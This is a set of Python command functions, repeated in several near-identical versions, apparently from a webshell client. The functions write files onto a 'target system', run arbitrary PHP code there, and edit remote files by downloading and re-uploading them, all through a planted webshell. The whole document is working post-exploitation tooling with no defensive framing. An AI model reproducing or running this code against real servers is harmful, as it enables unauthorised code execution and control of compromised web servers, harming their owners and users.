def run(web_file_path: str, editor: str = ""):
"""
write
Write files directly to the target system by notepad / vi as default or your own editor.
eg: write {web_file_path} {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, 'a').close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(color.red(f"\nWrite {web_file_path} failed.\n"))
remove(real_file_path)
def run(editor: str = ""):
"""
execute
execute Custom PHP code by notepad / vi as default or your own editor.
eg: execute {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, "a").close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
code = f.read()
if (code.startswith("<?php")):
code = code[5:]
if (code.endswith("?>")):
code = code[:-2]
print(color.yellow("Execute php code..."))
res = send(code)
if (not res):
return
text = res.r_text.strip()
status_code = color.green(str(
res.status_code)) if res.status_code == 200 else color.yellow(
str(res.status_code))
print(
f"\n{color.green('Result:')}\n[{status_code}] {color.cyan('length')}: {len(text)} \n{text}\n"
)
remove(real_file_path)
def run(web_file_path: str):
"""
write
Write files directly to the target system by notepad/vi.
eg: write {web_file_path}
"""
file_name = path.split(web_file_path)[1]
file_path = gget("webshell.download_path", "webshell").replace(":", "_")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name)
with open(real_file_path, "w"):
pass
open_editor(real_file_path)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\w+", text) and text != '0'):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(
color.red(f"\nWrite {web_file_path} failed.") +
color.yellow("\n\nResponse:") + f"\n{text}\n")
remove(real_file_path)
def run():
"""
execute
execute Custom PHP code by notepad/vi.
eg: execute
"""
file_name = "tmp" + str(uuid4())
file_path = gget("webshell.download_path", "webshell").replace(":", "_")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name)
with open(real_file_path, "w"):
pass
open_editor(real_file_path)
with open(real_file_path, "r") as f:
code = f.read().strip("<?php").strip("?>")
print(color.yellow("Execute php code..."))
res = send(code)
if (not res):
return
text = res.r_text.strip()
print(color.green("\nResult:\n") + text + "\n")
remove(real_file_path)
def run(editor: str = ""):
"""
execute
execute Custom PHP code by notepad / vi as default or your own editor.
eg: execute {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, "a").close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
code = f.read().strip("<?php").strip("?>")
print(color.yellow("Execute php code..."))
res = send(code)
if (not res):
return
text = res.r_text.strip()
print(color.green("\nResult:\n") + text + "\n")
remove(real_file_path)
def run(web_file_path: str, editor: str = ""):
"""
edit
edit file from target system (download->edit->upload) by notepad / vi as default or your own editor.
eg: edit {web_file_path} {editor=""}
"""
webshell_pf = gget("webshell.pf")
download_file_path = webshell_pf["download"].run(web_file_path)
if (not download_file_path):
return
flag = open_editor(download_file_path, editor)
if (not flag):
print("\n" + color.red(f"Call {editor} failed") + "\n")
return
webshell_pf["upload"].run(download_file_path, web_file_path, True)
def run(web_file_path: str):
"""
edit
edit file from target system (download->edit->upload) by notepad/vi.
eg: edit {web_file_path}
"""
webshell_pf = gget("webshell.pf")
download_file_path = webshell_pf["download"].run(web_file_path)
if (not download_file_path):
return
flag = open_editor(download_file_path)
if (not flag):
print("\n" + color.red("Call vi / notepad failed") + "\n")
return
webshell_pf["upload"].run(download_file_path, web_file_path, True)
